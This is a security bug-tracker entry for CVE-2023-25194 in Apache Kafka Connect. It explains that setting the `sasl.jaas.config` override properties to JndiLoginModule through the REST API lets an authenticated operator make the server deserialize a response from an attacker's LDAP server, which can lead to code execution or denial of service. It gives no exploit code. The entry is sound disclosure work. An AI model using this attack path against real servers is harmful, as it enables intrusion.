Bug 2216516 (CVE-2023-25194) - CVE-2023-25194 kafka: RCE/DoS via SASL JAAS JndiLoginModule configuration in Kafka Connect
Summary: CVE-2023-25194 kafka: RCE/DoS via SASL JAAS JndiLoginModule configuration in ...
Keywords:
Status: NEW
Alias: CVE-2023-25194
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Nobody
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks: 2167967
TreeView+ depends on / blocked
 
Reported: 2023-06-21 16:08 UTC by Chess Hazlett
Modified: 2023-07-21 22:26 UTC (History)
9 users (show)

Fixed In Version: apache kafka 3.4.0
Doc Type: ---
Doc Text:
A flaw was found in Apache Kafka Connect's REST API that permits configuration of SASL property by an authenticated operator, which could allow connection to a malicious LDAP server and subsequent deserialization of malicious content. This issue could allow an authenticated attacker to cause a denial of service or execute arbitrary code on the server, given presence of vulnerable classes on the server's classpath.
Clone Of:
Environment:
Last Closed:
Embargoed:

Attachments (Terms of Use)

Description Chess Hazlett 2023-06-21 16:08:21 UTC 
When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.

This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
Note You need to log in before you can comment on or make changes to this bug.